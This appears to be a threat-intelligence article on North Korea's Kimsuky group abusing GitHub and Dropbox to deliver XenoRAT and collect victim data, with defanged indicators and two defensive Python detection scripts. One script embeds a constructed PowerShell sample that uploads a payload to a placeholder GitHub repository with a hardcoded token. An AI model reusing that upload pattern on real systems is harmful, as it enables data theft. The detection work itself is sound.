North Korean Hackers Weaponize GitHub Infrastructure to Distribute Malware
Cybersecurity researchers have uncovered a sophisticated spearphishing campaign orchestrated by the North Korean threat group Kimsuky, leveraging GitHub as a critical piece of attack infrastructure to distribute malware since March 2025.
This operation, identified through analysis of a malicious PowerShell script posted on X, showcases an alarming abuse of legitimate platforms like GitHub and Dropbox to host and disseminate malicious payloads, including the open-source XenoRAT.
Sophisticated Spearphishing Campaign
The attackers embedded hardcoded GitHub Personal Access Tokens (PATs) with repository scope in the malware, granting read and write access to private repositories used as command and control (C&C) infrastructure for storing malware, decoy files, and exfiltrated victim data.

The attack begins with spearphishing emails tailored to specific South Korean targets, often impersonating trusted entities like law firms or financial authorities.
These emails contain password-protected archives with malicious attachments, designed to execute PowerShell scripts that download payloads from GitHub repositories or Dropbox URLs.
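As an added illustration of the defender-side check this paragraph implies (not code from the report or from the campaign), the following Python helper performs static triage on a suspicious PowerShell attachment: it flags hardcoded GitHub token formats and calls to the repository contents API made with a PUT method, the combination the report describes. The sample script, the `EXAMPLE-OWNER/EXAMPLE-REPO` slug and the token value are constructed for this example; the token prefixes follow GitHub's documented formats.

```python
"""Static triage of a suspicious PowerShell script for hardcoded GitHub tokens
and GitHub-as-C2 usage. Hypothetical detection helper written for this
article; the token formats follow GitHub's documented prefixes."""
import re

# Classic PATs are "ghp_" followed by 36 alphanumerics; fine-grained PATs are
# "github_pat_", 22 chars, "_", then 59 chars.
TOKEN_PATTERNS = {
    "classic_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "fine_grained_pat": re.compile(r"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b"),
}
# Writing through the contents API is how a script would push data into a repo.
CONTENTS_API = re.compile(
    r"https://api\.github\.com/repos/([^/\s\"']+)/([^/\s\"']+)/contents/[^\s\"']*"
)
PUT_METHOD = re.compile(r"-Method\s+['\"]?Put\b", re.IGNORECASE)
# Hosts the report names for payload and decoy delivery.
PAYLOAD_URL = re.compile(
    r"https://(?:raw\.githubusercontent\.com|(?:www\.)?dropbox\.com)/[^\s\"']+"
)

# Constructed sample: the shape of a downloader/uploader, with placeholder
# owner, repo and token (the token is not a real credential).
SAMPLE_SCRIPT = r'''
$token = "ghp_A1b2A1b2A1b2A1b2A1b2A1b2A1b2A1b2A1b2"
$hdr = @{ Authorization = "token $token"; "User-Agent" = "ps" }
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/EXAMPLE-OWNER/EXAMPLE-REPO/main/decoy.txt" -Headers $hdr
Invoke-RestMethod -Uri "https://api.github.com/repos/EXAMPLE-OWNER/EXAMPLE-REPO/contents/logs/host.txt" -Method Put -Headers $hdr -Body $payload
'''


def redact(token):
    """Keep only the prefix and last four characters so findings can be shared."""
    return f"{token[:4]}...{token[-4:]}"


def scan_script(text):
    """Return the indicators found in a script: tokens, write targets, hosts."""
    findings = {
        "hardcoded_tokens": [],
        "github_write_repos": [],
        "uses_put": bool(PUT_METHOD.search(text)),
        "payload_urls": PAYLOAD_URL.findall(text),
    }
    for name, pattern in TOKEN_PATTERNS.items():
        for tok in pattern.findall(text):
            findings["hardcoded_tokens"].append(f"{name}:{redact(tok)}")
    for owner, repo in CONTENTS_API.findall(text):
        slug = f"{owner}/{repo}"
        if slug not in findings["github_write_repos"]:
            findings["github_write_repos"].append(slug)
    return findings


def risk_level(findings):
    """A token plus a PUT to the contents API is the exfiltration pattern;
    either alone, or a third-party payload host, still deserves a look."""
    if findings["hardcoded_tokens"] and findings["github_write_repos"] and findings["uses_put"]:
        return "high"
    if findings["hardcoded_tokens"] or findings["github_write_repos"] or findings["payload_urls"]:
        return "medium"
    return "low"


if __name__ == "__main__":
    result = scan_script(SAMPLE_SCRIPT)
    print(risk_level(result), result)
```

The redaction step matters in practice: a triage report that quotes the full token would itself leak a live credential that should instead be reported to GitHub for revocation.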
Detailed Attack Flow
Repositories such as “hole_311” and “star,” associated with attacker accounts “Dasi274” and “luckmask,” revealed a meticulous structure with decoy documents, infostealer scripts (e.g., onf.txt), and downloader scripts (e.g., ofx.txt) that upload victim logs every 30 minutes via scheduled tasks.
According to the report, analysis of these repositories exposed IP addresses used for testing (e.g., 80.71.157[.]55, linked to the 2024 MoonPeak campaign by the Kimsuky-affiliated cluster UAT-5394) and C&C servers such as 158.247.202[.]109, which hosts a Naver phishing site displaying “Million OK!!!!”, a hallmark of Kimsuky operations.
Further attribution to Kimsuky stems from shared GUIDs in XenoRAT samples (e.g., 12DE1212-167D-45BA-1284-780DA98CF901), identical string encryption methods across malware variants, and domain naming conventions like “p-e.kr” typical of this DPRK-nexus group.
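The scheduled-task uploader described above (victim logs pushed to GitHub every 30 minutes) leaves a cadence in proxy logs that a hunt can pick up. The Python below is an added example, not code from the report: it parses constructed proxy log lines, keeps writes to the GitHub contents API per client, and reports clients whose writes recur at a near-constant interval. The log format, client addresses and `EXAMPLE-OWNER` repository names are all assumptions made for this example.

```python
"""Hunt proxy logs for hosts writing to the GitHub contents API on a fixed
cadence. Hypothetical detection logic written for this article; the log
format and every address below are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed proxy log lines: "<ISO timestamp> <client ip> <method> <host> <path>"
SAMPLE_LOG = """\
2025-03-20T09:00:02Z 10.0.0.5 PUT api.github.com /repos/EXAMPLE-OWNER/EXAMPLE-REPO/contents/logs/a.txt
2025-03-20T09:05:10Z 10.0.0.7 GET github.com /EXAMPLE-OWNER/tools
2025-03-20T09:30:01Z 10.0.0.5 PUT api.github.com /repos/EXAMPLE-OWNER/EXAMPLE-REPO/contents/logs/b.txt
2025-03-20T09:41:55Z 10.0.0.7 GET api.github.com /repos/EXAMPLE-OWNER/tools/releases
2025-03-20T10:00:04Z 10.0.0.5 PUT api.github.com /repos/EXAMPLE-OWNER/EXAMPLE-REPO/contents/logs/c.txt
2025-03-20T10:30:00Z 10.0.0.5 PUT api.github.com /repos/EXAMPLE-OWNER/EXAMPLE-REPO/contents/logs/d.txt
2025-03-20T10:31:12Z 10.0.0.7 PUT api.github.com /repos/EXAMPLE-OWNER/tools/contents/README.md
"""


def parse(log_text):
    """Yield (timestamp, client, method, host, path) for each non-empty line."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, method, host, path = line.split(maxsplit=4)
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, method, host, path


def find_periodic_github_writes(log_text, min_events=3, jitter_s=120):
    """Flag clients whose contents-API writes recur at a near-constant interval.

    min_events: how many writes are needed before a cadence is judged.
    jitter_s:   allowed deviation of each gap from the median gap, in seconds
                (scheduled tasks drift by a few seconds, humans do not keep time).
    """
    writes = defaultdict(list)
    for ts, src, method, host, path in parse(log_text):
        if host == "api.github.com" and method.upper() in ("PUT", "POST") and "/contents/" in path:
            writes[src].append(ts)

    findings = []
    for src, times in writes.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if all(abs(g - med) <= jitter_s for g in gaps):
            findings.append({"src": src, "writes": len(times), "interval_s": round(med)})
    return findings


if __name__ == "__main__":
    for hit in find_periodic_github_writes(SAMPLE_LOG):
        print(f"{hit['src']}: {hit['writes']} writes every ~{hit['interval_s']}s")
```

On the constructed log the developer host 10.0.0.7 makes a single README write and is ignored, while 10.0.0.5 shows four writes spaced roughly 1,800 seconds apart, the 30-minute cadence in the report. In a real environment the same logic can be pointed at GitHub audit logs or EDR network telemetry; the beacon check is the interesting part, and an organisation that does not use GitHub at all can simply alert on any write to the contents API.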

The malware, once executed, performs system reconnaissance, keylogging, and data exfiltration to GitHub, exploiting the platform’s trust and accessibility to bypass traditional security measures.
This campaign’s sophistication lies in its targeted approach: the attackers created a separate repository for each victim, with personalized decoy files ranging from debt repayment notices to cryptocurrency seed phrases, luring victims into executing malicious code.
Additional Dropbox URLs (around 10 identified) indicate a broader, ongoing operation beyond the analyzed cases, highlighting Kimsuky’s persistent evolution in cyber tactics.
The use of obfuscated .NET executables, state-machine obfuscation in XenoRAT, and dynamic string loading from resource sections further complicates detection.
Users are urged not to execute suspicious email attachments, to verify sender authenticity, and to scan files with tools like VirusTotal, bearing in mind that such scanners cannot inspect the contents of password-protected archives.
This incident underscores the urgent need for heightened vigilance and robust security measures to counter advanced persistent threats exploiting legitimate platforms for nefarious purposes.
Indicators of Compromise (IOCs)
Type | Value |
---|---|
C&C IP | 80.71.157[.]55, 158.247.253[.]215, 165.154.78[.]9 |
Mutex | Dansweit_Hk65, Cheetah_0716 |
Email | [email protected] (address obscured by the source page) |
.NET GUID | 12DE1212-167D-45BA-1284-780DA98CF901 |